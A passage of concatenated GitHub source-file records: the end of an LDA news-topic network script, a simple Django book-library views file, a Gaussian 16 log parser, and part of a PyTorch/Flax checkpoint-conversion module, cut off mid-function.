\"/Users/shrmnl/Github/text-mining-g1-7/saved_states/\"\nSAVED_FIGURES = \"/Users/shrmnl/Github/text-mining-g1-7/plt_figures/\"\n\n\ndef getMajorTopic(arr):\n topic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n max_percentage = 0\n topic = -1\n for tup in arr:\n if tup[1] > max_percentage:\n max_percentage = tup[1]\n topic = tup[0]\n major_topic_word = topic_name_id[topic]\n return topic, max_percentage, major_topic_word\n\ndef percentageMapper(arr):\n topic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n result = {}\n for tup in arr:\n name = topic_name_id[tup[0]]\n if result.get(name, False) == False:\n result[name] = 0\n result[name] += tup[1]\n return result\n\n## Lancaster stemmer very harsh not advisable\ndef clean_content_FASTEST(row):\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [l_stemmer.stem(lemmatizer.lemmatize(x.lower(), pos='v')) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## Best and most trusted\ndef clean_content_FAST(row):\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [stemmer.stem(lemmatizer.lemmatize(x.lower(), pos='v')) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## slower but more gentle \ndef clean_content_SLOW(row):\n ## remove html tags\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n ## remove non alphanumeric characters\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [p_stemmer.stem(x.lower()) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## load the process dataframe with lda topics added already\n# df = pd.read_json(f\"{SAVED_STATES_FOLDER}df_processed_lda.json\", orient=\"records\")\ndf = pd.read_csv(\"./covid19_articles_20200914.csv\")\n\n## load dictionary, corpus, and lda model\ndictionary = corpora.Dictionary.load(f\"{SAVED_STATES_FOLDER}dictionary\")\ncorpus_tfidf = corpora.MmCorpus(f\"{SAVED_STATES_FOLDER}corpus\")\nmodel_filepath = datapath(f\"{SAVED_STATES_FOLDER}lda_model\")\nlda_model = models.LdaModel.load(model_filepath)\n\ntopic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n\n## Get distribution per news agency per topic\n# news_agency_topic_distribution = {}\n# for i, row in df.iterrows():\n# news_agency = row[\"domain\"]\n# val = lda_model[corpus_tfidf[i]]\n# topic, max_percentage, topic_name = getMajorTopic(val)\n\n# if news_agency_topic_distribution.get(news_agency, False) == False:\n# news_agency_topic_distribution[news_agency] = {}\n \n# if news_agency_topic_distribution[news_agency].get(topic_name, False) == False:\n# news_agency_topic_distribution[news_agency][topic_name] = 
0\n\n# news_agency_topic_distribution[news_agency][topic_name] += 1\n\n# with open(\"news_agency_topic_distribution.json\", \"w+\") as fp:\n# json.dump(news_agency_topic_distribution, fp, indent=2)\n\n\ndef getMaxOf(arr):\n if len(arr) == 1:\n return topic_name_id[arr[0][0]]\n \n best_topic = arr[0]\n for tup in arr:\n if tup[1] > best_topic[1]:\n best_topic = tup\n \n return topic_name_id[best_topic[0]]\n\nfor i, row in df.iterrows():\n df.loc[i, \"lda_topic\"] = getMaxOf(lda_model[corpus_tfidf[i]])\n\n## Create a domain dict with the respective weights for the various topics\ndomains = df.domain.unique().tolist()\nlda_topics = df['lda_topic'].unique().tolist()\n\nweight_domain_dict = {}\nfor domain in domains:\n valueCounts = df[df[\"domain\"] == domain].lda_topic.value_counts()\n active_topics = valueCounts.index.tolist()\n active_topic_values = valueCounts.tolist()\n if weight_domain_dict.get(domain, False) == False:\n weight_domain_dict[domain] = {}\n weight_domain_dict[domain][\"total_articles\"] = sum(active_topic_values)\n\n for i in range(len(active_topics)):\n weight_domain_dict[domain][active_topics[i]] = active_topic_values[i]\n\nfor domain in weight_domain_dict.keys():\n sub_dict = weight_domain_dict[domain]\n for topic, count in sub_dict.items():\n if topic != \"total_articles\":\n percentage = count / sub_dict[\"total_articles\"]\n sub_dict[topic] = {\n \"count\": count,\n \"percentage\": percentage,\n }\n\n# json.dump(weight_domain_dict, open(\"weight_domain_dict.json\", \"w+\"), indent=2) \n\nG = nx.Graph()\n## Example:\n## G.add_edge(\"a\", \"b\", weight=0.6)\n\n## Filter weight_domain_dict\n# targetted_companies = ['cnn', 'theguardian', 'nature', 'scientificamerican', 'nytimes','cnbc', 'bbc','scmp', 'reuters', 'finance.yahoo','theverge','independent', 'newyorker','japantimes','hbr']\ntargetted_companies = df.domain.unique().tolist()\nweight_domain_dict = {k: v for k,v in weight_domain_dict.items() if k in targetted_companies}\n\nfor i in range(len(weight_domain_dict.keys())):\n domains = list(weight_domain_dict.keys())\n target_domain_name = domains[i]\n other_domains = domains[:i] + domains[i + 1:]\n domain = weight_domain_dict[target_domain_name]\n\n for other_domain_name in other_domains:\n other_domain = weight_domain_dict[other_domain_name]\n other_domain_topics = list(other_domain.keys())\n\n for topic in list(domain.keys())[1:]:\n if other_domain.get(topic, False):\n if G.get_edge_data(target_domain_name, other_domain_name) == None:\n G.add_edge(target_domain_name, other_domain_name, weight=0)\n old_weight = G.get_edge_data(target_domain_name, other_domain_name)[\"weight\"]\n new_weight = old_weight + min(domain[topic][\"count\"], other_domain[topic][\"count\"])\n\n G.add_edge(target_domain_name, other_domain_name, weight=new_weight)\n\nnx.write_graphml_lxml(G, \"results/news_agencies_network_lda.graphml\")\n\n## Graphing code no need to edit below\nplt.figure(figsize=(100,100))\n# edge_list = [(u, v) for (u, v, d) in G.edges(data=True)]\n# pos = nx.spring_layout(G, k=5, iterations=20)\n# nx.draw_networkx_nodes(G, pos, node_size=60)\n# nx.draw_networkx_edges(G, pos, edgelist=edge_list, width=1)\n# nx.draw_networkx_labels(G, pos, font_size=10, font_family=\"sans-serif\")\nnx.draw(G, with_labels=True, node_size=60)\nplt.axis(\"off\")\n# 
plt.show()\nplt.savefig(\"results/news_agencies_network_lda.png\")","repo_name":"shermanleejm/text-mining-g1-7","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"21100985852","text":"# Create your views here.\n# -*- coding: UTF-8 -*-\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse,HttpResponseRedirect\nimport datetime\nfrom lib_manage.models import Book,Author\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\n\ndef hello(request):\n return HttpResponse(\"Hello world\")\n\ndef current_datetime(request):\n now = datetime.datetime.now()\n #html = \"It is now %s.\" % now\n return HttpResponse(now)\n \ndef current_datetime2(request):\n now = datetime.datetime.now()\n c = Context({'time':now})\n return render_to_response(\"time.html\", c)\n \ndef main(request):\n return render_to_response(\"welcome.html\")\n \ndef addBook(request):\n if request.POST:\n post = request.POST\n try:\n authorid = Author.objects.get(Name = post[\"Authorname\"])\n new_Book = Book(\n Title = post[\"Title\"],\n AuthorID = authorid,\n Publisher = post[\"Publisher\"],\n PublishDate = post[\"PublishDate\"], \n Price = post[\"Price\"]\n )\n new_Book.save()\n #q = Author.AuthorID()\n \n return HttpResponseRedirect(\"/addBook/\") \n except ObjectDoesNotExist:\n return HttpResponseRedirect(\"/addAuthor/\") \n \n\n return render_to_response(\"addbook.html\")\n \ndef addAuthor(request):\n if request.POST:\n post = request.POST\n new_Author = Author( \n Name = post[\"Name\"],\n Age = post[\"Age\"],\n Country = post[\"Country\"] \n )\n new_Author.save() \n return HttpResponseRedirect(\"/addBook/\") \n return render_to_response(\"addAuthor.html\")\n\n\ndef Search(request):\n if 'query' in request.GET and request.GET['query']:\n tmp = request.GET['query']\n try:\n person = Author.objects.get(Name = tmp)# exact match on the author name\n book_list = person.book_set.all()\n c = Context({\"book_list\":book_list,\"query\":person.Name,})\n except ObjectDoesNotExist:\n book_list = None\n person = None\n c = Context({\"book_list\":book_list,\"query\":person,})\n return render_to_response('AllBooks.html', c)\n #showBooks(tmp)\n return render_to_response('Search.html')\n\n#def showBooks(request):\n #global tmp\n\n \ndef details(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n c = Context({\"book\":book,\"author\":author,})\n return render_to_response('details.html',c)\n \ndef delete(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n book.delete()\n # filter() never raises ObjectDoesNotExist; check for emptiness instead\n if not Book.objects.filter(AuthorID = author.AuthorID).exists():\n author.delete()\n return HttpResponseRedirect(\"/search/\")\n \ndef update(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n if request.POST:\n post = request.POST\n #book.AuthorID = author\n book.Publisher = post[\"Publisher\"]\n book.PublishDate = post[\"PublishDate\"]\n book.Price = post[\"Price\"]\n #author.AuthorID = post[\"AuthorID\"]\n author.Name = post[\"Name\"]\n author.Age = post[\"Age\"]\n author.Country = post[\"Country\"] \n book.save()\n 
author.save()\n return render_to_response('update.html')\n \n \n \n \n","repo_name":"nameleiyu/Lab4","sub_path":"lib_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25586776194","text":"# -*- coding: utf-8 -*-\n# ====================================== #\n# @Author : Yanbo Han\n# @Email : yanbohan98@gmail.com\n# @File : fileprase.py\n# ALL RIGHTS ARE RESERVED UNLESS STATED.\n# ====================================== #\n\nimport logging\nimport os\nimport re\n\nfrom ase.units import Hartree, eV\n\n\nclass CalculationResultError(Exception):\n pass\n\n\nclass G16LogFiles(object):\n r\"\"\"\n .log File parser for g16 calculation result.\n\n Attributes\n ----------\n content:dict\n dict consist of all useful contents in the file.\n \"\"\"\n\n def __init__(self, path: str, readOpt=True):\n self.path = path\n self.content = {'taskTitle': '',\n 'taskMethod': '',\n 'StructureDict': [],\n 'CPUTime': {\n 'days': None,\n 'hours': None,\n 'minutes': None,\n 'seconds': None\n },\n 'NormalTerminate': False,\n 'EnergyDict': [],\n 'SpinMulti': 1,\n 'Charge': 0,\n # 'GAPDict': {\n # 'SCFAttr': [],\n # 'SCFEnergy': []\n # }\n }\n if readOpt:\n # read context from the file.\n self.readfiles()\n\n def readfiles(self):\n par_tasktitle = re.compile(\n r' -+\\n (.*?)\\n -+\\n Symbolic Z-matrix:')\n par_tasktitle_restart = re.compile(\n r' -+\\n (.*?)\\n -+\\n Structure from the checkpoint')\n par_taskmethod = re.compile(\n r' #(.*?)\\n')\n par_cputime = re.compile(\n r'Job cpu time:(.*?) days (.*?) hours (.*?) minutes (.*?) seconds.\\n', re.S)\n par_NormalTerminate = re.compile(r'Normal termination', re.S)\n par_ErrorTerminate = re.compile(r'Error termination', re.S)\n\n par_EnergyDictSCF = re.compile(r'SCF Done:.*?= {2}(.*?) {5}A.U.', re.S)\n par_StructureDictSCF = re.compile(\n r'Number {5}Number {7}Type {13}X {11}Y {11}Z\\n '\n r'---------------------------------------------------------------------\\n (.*?)\\n '\n r'---------------------------------------------------------------------',\n re.S)\n par_SpinMulti = re.compile(r'Multiplicity = (.*?)\\n')\n par_Charge = re.compile(r'Charge = (.*?) 
Multiplicity')\n # Parse method, titles, timings, energies, structures, charge and spin\n # from the whole log file in one pass.\n # TODO: add a read mode (\"all\" vs \"last\") selecting which \"SCF Done\" blocks to keep.\n with open(self.path) as file:\n text = file.read()\n self.content['taskMethod'] = par_taskmethod.findall(text)[0]\n try:\n self.content['taskTitle'] = par_tasktitle.findall(text)[0]\n except IndexError as e:\n try:\n self.content['taskTitle'] = par_tasktitle_restart.findall(text)[0]\n except IndexError as e:\n if \"restart\" in self.content['taskMethod']:\n pass\n else:\n raise e\n self.content['CPUTime']['days'], self.content['CPUTime']['hours'], self.content['CPUTime']['minutes'], \\\n self.content['CPUTime']['seconds'] = [float(i) for i in par_cputime.findall(text)[0]]\n self.content['NormalTerminate'] = (par_NormalTerminate.findall(text)[0]) != '' and (\n len(par_ErrorTerminate.findall(text)) == 0)\n self.content['EnergyDict'] = [float(i) for i in par_EnergyDictSCF.findall(text)]\n self.content['StructureDict'] = [i for i in par_StructureDictSCF.findall(text)]\n self.content['SpinMulti'] = float(par_SpinMulti.findall(text)[0])\n self.content['Charge'] = float(par_Charge.findall(text)[0])\n\n def exportcontent(self):\n \"\"\"\n\n Returns\n -------\n str:\n result summary\n\n \"\"\"\n return self.path + \"\\t\" + self.content['taskMethod'] + \"\\t\" + str(\n self.content['EnergyDict'][-1]) + '\\t' + str(self.content['NormalTerminate']) + '\\n'\n\n def get_content(self, idx):\n r\"\"\"\n\n Parameters\n ----------\n idx:int\n index of which structure in the file.\n\n Returns\n -------\n\n \"\"\"\n if self.content['NormalTerminate']:\n return {'taskTitle': self.content['taskTitle'],\n 'taskMethod': self.content['taskMethod'],\n 'StructureDict': self.content['StructureDict'][idx],\n 'EnergyDict': self.content['EnergyDict'][idx],\n 'SpinMulti': self.content['SpinMulti'],\n 'Charge': self.content['Charge'],\n }\n else:\n raise CalculationResultError(\n \"Result in `{}` seems not NormalTerminate. 
Please check the \"\n \"file manually.\".format(os.path.abspath(self.path))\n )\n\n def get_contents(self, idx, ignoreFail=False):\n \"\"\"\n\n Parameters\n ----------\n idx:list of int,iterable\n list of index of structure\n ignoreFail:bool\n whether to ignore fail calculation or not\n\n Returns\n -------\n\n \"\"\"\n contents = []\n if not isinstance(idx, list):\n idx = list(idx)\n for item in idx:\n try:\n contents.append(self.get_content(item))\n except CalculationResultError:\n if not ignoreFail:\n raise\n else:\n pass\n return contents\n\n def get_ase_atoms(self, idxs):\n from ase import Atoms\n AtomsList = []\n for item in idxs:\n stuc = self.get_content(item)\n symbols, positions = structureDictParser(stucDict=stuc[\"StructureDict\"])\n at = Atoms(\n numbers=symbols,\n positions=positions,\n info={\"SpinMulti\": stuc[\"SpinMulti\"],\n \"Charge\": stuc[\"Charge\"]}\n )\n AtomsList.append(at)\n return AtomsList\n\n def get_energy(self, idx):\n \"\"\"Use eV as energy unit\"\"\"\n return self.content['EnergyDict'][idx] * Hartree / eV\n\n def get_energies(self, idxs):\n \"\"\"Use eV as energy unit\"\"\"\n energies = []\n for item in idxs:\n energies.append(self.content['EnergyDict'][item] * Hartree / eV)\n return energies\n\n def get_all_pairs(self):\n r\"\"\"\n Get all Atoms:properties pairs\n\n Returns\n -------\n (ase.Atoms, list)\n\n \"\"\"\n n = len(self.content['EnergyDict'])\n ats, en = self.get_ase_atoms(range(n)), self.get_energies(range(n))\n if len(en) >= 2:\n # for opt-freq task\n if en[-1] == en[-2]:\n ats = ats[:-1]\n en = en[:-1]\n return ats, en\n\n def get_final_pairs(self):\n r\"\"\"\n Get the last Atoms:properties pairs\n often used for g16 opt task and check.\n\n Returns\n -------\n ([ase.Atoms], list)\n\n \"\"\"\n from ase.io.gaussian import read_gaussian_out\n try:\n result = ([read_gaussian_out(open(self.path, \"r\"))],\n [read_gaussian_out(open(self.path, \"r\")).get_potential_energy()]\n )\n return result\n except IndexError:\n tmp = self.get_all_pairs()\n logging.warning(\"Wrong in calling ase read, please check your files.\")\n return [tmp[0][-1]], [tmp[1][-1]]\n\n\ndef structureDictParser(stucDict):\n symbols = []\n positions = []\n for atom in stucDict.split(\"\\n\"):\n col = atom.split()\n symbols.append(int(col[1]))\n positions.append(list(float(i) for i in col[3:]))\n return symbols, positions\n\n\nif __name__ == '__main__':\n\n file = G16LogFiles(\"D:\\CODE\\PycharmProjects\\lightMolNet\\examples\\logdata\\C20_Ih_1.log\")\n all_atoms = []\n all_properties = []\n for at, en in zip(file.get_all_pairs()[0], file.get_all_pairs()[1]):\n properties = {}\n all_atoms.append(at)\n pn = \"energy_U0\"\n properties[pn] = en * Hartree / eV\n all_properties.append(properties)\n print(all_atoms[0].__dict__)\n","repo_name":"saltball/lightMolNet","sub_path":"src/lightMolNet/datasets/fileprase.py","file_name":"fileprase.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24353521391","text":"import os\nfrom pickle import UnpicklingError\nfrom typing import Dict, Tuple\n\nimport numpy as np\n\nimport jax\nimport jax.numpy as jnp\nimport transformers\nfrom flax.serialization import from_bytes\nfrom flax.traverse_util import flatten_dict, unflatten_dict\n\nfrom .utils import logging\n\n\nlogger = logging.get_logger(__name__)\n\n\n#####################\n# PyTorch => Flax #\n#####################\n\n\ndef load_pytorch_checkpoint_in_flax_state_dict(\n flax_model, 
pytorch_checkpoint_path, is_sharded, allow_missing_keys=False\n):\n \"\"\"Load pytorch checkpoints in a flax model\"\"\"\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\n \"Loading a PyTorch model in Flax, requires both PyTorch and Flax to be installed. Please see\"\n \" https://pytorch.org/ and https://flax.readthedocs.io/en/latest/installation.html for installation\"\n \" instructions.\"\n )\n raise\n\n if not is_sharded:\n pt_path = os.path.abspath(pytorch_checkpoint_path)\n logger.info(f\"Loading PyTorch weights from {pt_path}\")\n\n pt_state_dict = torch.load(pt_path, map_location=\"cpu\")\n logger.info(f\"PyTorch checkpoint contains {sum(t.numel() for t in pt_state_dict.values()):,} parameters.\")\n\n flax_state_dict = convert_pytorch_state_dict_to_flax(pt_state_dict, flax_model)\n else:\n # model is sharded and pytorch_checkpoint_path already contains the list of .pt shard files\n flax_state_dict = convert_pytorch_sharded_state_dict_to_flax(pytorch_checkpoint_path, flax_model)\n return flax_state_dict\n\n\ndef rename_key_and_reshape_tensor(\n pt_tuple_key: Tuple[str],\n pt_tensor: np.ndarray,\n random_flax_state_dict: Dict[str, jnp.ndarray],\n model_prefix: str,\n) -> (Tuple[str], np.ndarray):\n \"\"\"Rename PT weight names to corresponding Flax weight names and reshape tensor if necessary\"\"\"\n\n def is_key_or_prefix_key_in_dict(key: Tuple[str]) -> bool:\n \"\"\"Checks if `key` of `(prefix,) + key` is in random_flax_state_dict\"\"\"\n return len(set(random_flax_state_dict) & set([key, (model_prefix,) + key])) > 0\n\n # layer norm\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"scale\",)\n if pt_tuple_key[-1] in [\"weight\", \"gamma\"] and is_key_or_prefix_key_in_dict(renamed_pt_tuple_key):\n return renamed_pt_tuple_key, pt_tensor\n\n # embedding\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"embedding\",)\n if pt_tuple_key[-1] == \"weight\" and is_key_or_prefix_key_in_dict(renamed_pt_tuple_key):\n return renamed_pt_tuple_key, pt_tensor\n\n # conv layer\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"kernel\",)\n if pt_tuple_key[-1] == \"weight\" and pt_tensor.ndim == 4 and not is_key_or_prefix_key_in_dict(pt_tuple_key):\n pt_tensor = pt_tensor.transpose(2, 3, 1, 0)\n return renamed_pt_tuple_key, pt_tensor\n\n # linear layer\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"kernel\",)\n if pt_tuple_key[-1] == \"weight\" and not is_key_or_prefix_key_in_dict(pt_tuple_key):\n pt_tensor = pt_tensor.T\n return renamed_pt_tuple_key, pt_tensor\n\n # old PyTorch layer norm weight\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"weight\",)\n if pt_tuple_key[-1] == \"gamma\":\n return renamed_pt_tuple_key, pt_tensor\n\n # old PyTorch layer norm bias\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"bias\",)\n if pt_tuple_key[-1] == \"beta\":\n return renamed_pt_tuple_key, pt_tensor\n\n return pt_tuple_key, pt_tensor\n\n\ndef convert_pytorch_state_dict_to_flax(pt_state_dict, flax_model):\n # convert pytorch tensor to numpy\n pt_state_dict = {k: v.numpy() for k, v in pt_state_dict.items()}\n\n model_prefix = flax_model.base_model_prefix\n random_flax_state_dict = flatten_dict(flax_model.params)\n flax_state_dict = {}\n\n load_model_with_head_into_base_model = (model_prefix not in flax_model.params) and (\n model_prefix in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n load_base_model_into_model_with_head = (model_prefix in flax_model.params) and (\n model_prefix not in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n\n # Need to change some 
parameters name to match Flax names\n for pt_key, pt_tensor in pt_state_dict.items():\n\n pt_tuple_key = tuple(pt_key.split(\".\"))\n\n # remove base model prefix if necessary\n has_base_model_prefix = pt_tuple_key[0] == model_prefix\n if load_model_with_head_into_base_model and has_base_model_prefix:\n pt_tuple_key = pt_tuple_key[1:]\n\n # Correctly rename weight parameters\n flax_key, flax_tensor = rename_key_and_reshape_tensor(\n pt_tuple_key, pt_tensor, random_flax_state_dict, model_prefix\n )\n\n # add model prefix if necessary\n require_base_model_prefix = (model_prefix,) + flax_key in random_flax_state_dict\n if load_base_model_into_model_with_head and require_base_model_prefix:\n flax_key = (model_prefix,) + flax_key\n\n if flax_key in random_flax_state_dict:\n if flax_tensor.shape != random_flax_state_dict[flax_key].shape:\n raise ValueError(\n f\"PyTorch checkpoint seems to be incorrect. Weight {pt_key} was expected to be of shape \"\n f\"{random_flax_state_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n )\n\n # also add unexpected weight so that warning is thrown\n flax_state_dict[flax_key] = jnp.asarray(flax_tensor)\n\n return unflatten_dict(flax_state_dict)\n\n\n############################\n# Sharded Pytorch => Flax #\n############################\n\n\ndef convert_pytorch_sharded_state_dict_to_flax(shard_filenames, flax_model):\n import torch\n\n # Load the index\n flax_state_dict = {}\n for shard_file in shard_filenames:\n # load using msgpack utils\n pt_state_dict = torch.load(shard_file)\n pt_state_dict = {k: v.numpy() for k, v in pt_state_dict.items()}\n\n model_prefix = flax_model.base_model_prefix\n random_flax_state_dict = flatten_dict(flax_model.params)\n\n load_model_with_head_into_base_model = (model_prefix not in flax_model.params) and (\n model_prefix in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n load_base_model_into_model_with_head = (model_prefix in flax_model.params) and (\n model_prefix not in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n # Need to change some parameters name to match Flax names\n for pt_key, pt_tensor in pt_state_dict.items():\n\n pt_tuple_key = tuple(pt_key.split(\".\"))\n\n # remove base model prefix if necessary\n has_base_model_prefix = pt_tuple_key[0] == model_prefix\n if load_model_with_head_into_base_model and has_base_model_prefix:\n pt_tuple_key = pt_tuple_key[1:]\n\n # Correctly rename weight parameters\n flax_key, flax_tensor = rename_key_and_reshape_tensor(\n pt_tuple_key, pt_tensor, random_flax_state_dict, model_prefix\n )\n # add model prefix if necessary\n require_base_model_prefix = (model_prefix,) + flax_key in random_flax_state_dict\n if load_base_model_into_model_with_head and require_base_model_prefix:\n flax_key = (model_prefix,) + flax_key\n\n if flax_key in random_flax_state_dict:\n if flax_tensor.shape != random_flax_state_dict[flax_key].shape:\n raise ValueError(\n f\"PyTorch checkpoint seems to be incorrect. 
Weight {pt_key} was expected to be of shape \"\n f\"{random_flax_state_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n )\n\n # also add unexpected weight so that warning is thrown\n flax_state_dict[flax_key] = jnp.asarray(flax_tensor)\n return unflatten_dict(flax_state_dict)\n\n\n#####################\n# Flax => PyTorch #\n#####################\n\n\ndef load_flax_checkpoint_in_pytorch_model(model, flax_checkpoint_path):\n \"\"\"Load flax checkpoints in a PyTorch model\"\"\"\n flax_checkpoint_path = os.path.abspath(flax_checkpoint_path)\n logger.info(f\"Loading Flax weights from {flax_checkpoint_path}\")\n\n # import correct flax class\n flax_cls = getattr(transformers, \"Flax\" + model.__class__.__name__)\n\n # load flax weight dict\n with open(flax_checkpoint_path, \"rb\") as state_f:\n try:\n flax_state_dict = from_bytes(flax_cls, state_f.read())\n except UnpicklingError:\n raise EnvironmentError(f\"Unable to convert {flax_checkpoint_path} to Flax deserializable object. \")\n\n return load_flax_weights_in_pytorch_model(model, flax_state_dict)\n\n\ndef load_flax_weights_in_pytorch_model(pt_model, flax_state):\n \"\"\"Load flax checkpoints in a PyTorch model\"\"\"\n\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\n \"Loading a Flax weights in PyTorch, requires both PyTorch and Flax to be installed. Please see\"\n \" https://pytorch.org/ and https://flax.readthedocs.io/en/latest/installation.html for installation\"\n \" instructions.\"\n )\n raise\n\n # check if we have bf16 weights\n is_type_bf16 = flatten_dict(jax.tree_util.tree_map(lambda x: x.dtype == jnp.bfloat16, flax_state)).values()\n if any(is_type_bf16):\n # convert all weights to fp32 if the are bf16 since torch.from_numpy can-not handle bf16\n # and bf16 is not fully supported in PT yet.\n logger.warning(\n \"Found ``bfloat16`` weights in Flax model. 
\n    flax_state_dict = flatten_dict(flax_state)\n    pt_model_dict = pt_model.state_dict()\n\n    load_model_with_head_into_base_model = (pt_model.base_model_prefix in flax_state) and (\n        pt_model.base_model_prefix not in set([k.split(\".\")[0] for k in pt_model_dict.keys()])\n    )\n    load_base_model_into_model_with_head = (pt_model.base_model_prefix not in flax_state) and (\n        pt_model.base_model_prefix in set([k.split(\".\")[0] for k in pt_model_dict.keys()])\n    )\n\n    # keep track of unexpected & missing keys\n    unexpected_keys = []\n    missing_keys = set(pt_model_dict.keys())\n\n    for flax_key_tuple, flax_tensor in flax_state_dict.items():\n        has_base_model_prefix = flax_key_tuple[0] == pt_model.base_model_prefix\n        require_base_model_prefix = \".\".join((pt_model.base_model_prefix,) + flax_key_tuple) in pt_model_dict\n\n        # adapt flax_key to prepare for loading from/to base model only\n        if load_model_with_head_into_base_model and has_base_model_prefix:\n            flax_key_tuple = flax_key_tuple[1:]\n        elif load_base_model_into_model_with_head and require_base_model_prefix:\n            flax_key_tuple = (pt_model.base_model_prefix,) + flax_key_tuple\n\n        # rename flax weights to PyTorch format\n        if flax_key_tuple[-1] == \"kernel\" and flax_tensor.ndim == 4 and \".\".join(flax_key_tuple) not in pt_model_dict:\n            # conv layer\n            flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n            flax_tensor = jnp.transpose(flax_tensor, (3, 2, 0, 1))\n        elif flax_key_tuple[-1] == \"kernel\" and \".\".join(flax_key_tuple) not in pt_model_dict:\n            # linear layer\n            flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n            flax_tensor = flax_tensor.T\n        elif flax_key_tuple[-1] in [\"scale\", \"embedding\"]:\n            flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n\n        flax_key = \".\".join(flax_key_tuple)\n\n        if flax_key in pt_model_dict:\n            if flax_tensor.shape != pt_model_dict[flax_key].shape:\n                raise ValueError(\n                    f\"Flax checkpoint seems to be incorrect. Weight {flax_key_tuple} was expected \"\n                    f\"to be of shape {pt_model_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n                )\n            else:\n                # add weight to pytorch dict\n                flax_tensor = np.asarray(flax_tensor) if not isinstance(flax_tensor, np.ndarray) else flax_tensor\n                pt_model_dict[flax_key] = torch.from_numpy(flax_tensor)\n                # remove from missing keys\n                missing_keys.remove(flax_key)\n        else:\n            # weight is not expected by PyTorch model\n            unexpected_keys.append(flax_key)\n\n    pt_model.load_state_dict(pt_model_dict)\n
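The renaming loop above encodes the two layout conventions: Flax stores conv kernels as (H, W, in, out) and dense kernels as (in, out), while PyTorch expects (out, in, H, W) and (out, in). The same transposes on hypothetical shapes:

    import numpy as np

    flax_conv = np.zeros((3, 3, 16, 32))            # Flax conv kernel: (H, W, in, out)
    pt_conv = np.transpose(flax_conv, (3, 2, 0, 1))
    assert pt_conv.shape == (32, 16, 3, 3)          # PyTorch conv weight: (out, in, H, W)

    flax_dense = np.zeros((128, 64))                # Flax dense kernel: (in, out)
    assert flax_dense.T.shape == (64, 128)          # PyTorch linear weight: (out, in)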
\n    # re-transform missing_keys to list\n    missing_keys = list(missing_keys)\n\n    if len(unexpected_keys) > 0:\n        logger.warning(\n            \"Some weights of the Flax model were not used when initializing the PyTorch model\"\n            f\" {pt_model.__class__.__name__}: {unexpected_keys}\\n- This IS expected if you are initializing\"\n            f\" {pt_model.__class__.__name__} from a Flax model trained on another task or with another architecture\"\n            \" (e.g. initializing a BertForSequenceClassification model from a FlaxBertForPreTraining model).\\n- This\"\n            f\" IS NOT expected if you are initializing {pt_model.__class__.__name__} from a Flax model that you expect\"\n            \" to be exactly identical (e.g. initializing a BertForSequenceClassification model from a\"\n            \" FlaxBertForSequenceClassification model).\"\n        )\n    else:\n        logger.warning(f\"All Flax model weights were used when initializing {pt_model.__class__.__name__}.\\n\")\n    if len(missing_keys) > 0:\n        